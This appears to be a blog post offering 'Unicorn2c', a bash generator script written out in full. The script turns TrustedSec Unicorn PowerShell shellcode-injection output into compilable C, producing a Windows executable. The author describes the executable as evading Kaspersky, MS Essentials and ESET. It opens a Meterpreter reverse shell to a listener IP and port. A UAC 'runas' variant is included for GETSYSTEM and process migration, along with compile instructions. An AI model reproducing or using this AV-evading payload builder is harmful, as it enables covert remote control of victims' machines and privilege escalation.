There is an excellent python script out made available by David Kennedy called the Unicorn; a simple python script that does PowerShell downgrade attack and inject shellcode straight into memory. The project page is here:
https://github.com/trustedsec/unicorn
Direct download is here:
https://github.com/trustedsec/unicorn/raw/master/unicorn.py
The usage is pretty simple, download the python script, save it to your metasploit root directory and execute it, the resulting ASCII output can be fed directly to the target PowerShell.
I have created a little generator that generates a compilable C code out of this so you can compile a nice Win32 PE executable which will get you by most modern AVs (Tested against Kaspersky, MS Essentials, ESET ..) it will only work on Windows 7,8 32/64 bits. I have tried it on XP with PowerShell installed but could not get it to run.
So here is the source for the Unicorn2c generator:
#!/bin/bash
clear
echo '--------------------------------------'
echo ' Unicorn Powershell2C code generator '
echo 'Works for Vista, Win7, Win8 32/64 bit'
echo '--------------------------------------'
if [ -z "$*" ];then
echo 'Usage: unicorn2c.sh payload reverse_ipaddr port platform'
echo 'Example: unicorn2c.sh windows/meterpreter/reverse_tcp 192.168.1.5 443 nonuac'
echo 'Valid platforms are: nonuac uac'
exit 0
fi
case $4 in
nonuac)
echo 'Generating nonUAC unicorn.c ...'
python unicorn.py $1 $2 $3
echo '#include <stdio.h>' > unicorn.c
echo '#include <string.h>' >> unicorn.c
echo '#include <stdlib.h>' >> unicorn.c
echo '#include <ctype.h>' >> unicorn.c
echo '#include <aclapi.h>' >> unicorn.c
echo '#include <shlobj.h>' >> unicorn.c
echo '#include <windows.h>' >> unicorn.c
echo '#pragma comment(lib, "advapi32.lib")' >> unicorn.c
echo '#pragma comment(lib, "shell32.lib")' >> unicorn.c
echo 'int main(int argc, char *argv[])' >> unicorn.c
echo '{' >> unicorn.c
echo 'FreeConsole();' >> unicorn.c
echo -n ' ShellExecute( NULL,NULL, "powershell.exe", "' >> unicorn.c
cat powershell_attack.txt | sed -r 's/^.{11}//' >> unicorn.c
echo -n '",NULL,NULL);' >> unicorn.c
echo '' >> unicorn.c
echo 'exit(0);' >> unicorn.c
echo '}' >> unicorn.c
todos unicorn.c
echo '[*] Exported unicorn.c To compile use cl.exe unicorn.c'
;;
uac)
echo 'Generating UAC unicorn.c ...'
python unicorn.py $1 $2 $3
echo '#include <stdio.h>' > unicorn.c
echo '#include <string.h>' >> unicorn.c
echo '#include <stdlib.h>' >> unicorn.c
echo '#include <ctype.h>' >> unicorn.c
echo '#include <windows.h>' >> unicorn.c
echo '#include <aclapi.h>' >> unicorn.c
echo '#include <shlobj.h>' >> unicorn.c
echo '#pragma comment(lib, "advapi32.lib")' >> unicorn.c
echo '#pragma comment(lib, "shell32.lib")' >> unicorn.c
echo 'int main(int argc, char *argv[])' >> unicorn.c
echo '{' >> unicorn.c
echo 'FreeConsole();' >> unicorn.c
echo -n ' ShellExecute( NULL, "runas", "powershell.exe", "' >> unicorn.c
cat powershell_attack.txt | sed -r 's/^.{11}//' >> unicorn.c
echo -n '",NULL,NULL);' >> unicorn.c
echo '' >> unicorn.c
echo 'exit(0);' >> unicorn.c
echo '}' >> unicorn.c
todos unicorn.c
echo '[*] Exported unicorn.c To compile use cl.exe unicorn.'
;;
"")
echo 'Usage: unicorn2c.sh payload reverse_ipaddr port platform'
echo 'Example: unicorn2c.sh windows/meterpreter/reverse_tcp 192.168.1.5 443 nonuac'
echo 'Valid platforms are: nonuac, uac'
exit 0
;;
esac
Save this as an executable shell script in your metasploit root directory and make sure you have the original unicorn.py in the path. Usage is simple, run the shell script with required options. There is a fourth variable there and that being nonuac and uac. The resulting C code is different in the shellexecute function option “runas” (for UAC) and NULL (for nonUAC).
If for example the UAC compiled binary is executed from an elevated command prompt then the shellexecute function loads powershell with same privileges enabling us to GETSYSTEM and migrate to any process. But if a non privileged user runs the UAC binary he gets prompted for credentials, thus there is an option to generate the C code as non-UAC, but from which we wont be able to GETSYSTEM or migrate to other processes then ours.
Compilation is easy, either Visual Studio C++ 2010,2012 express or full, using the Visual Studio Tools command prompt compile for 32bit ! like so:
cl.exe unicorn.c
Sometimes the binary takes a while to spawn a reverse shell on the listener, but this is maybe due to the fact that my system is virtual and I have low memory resources.
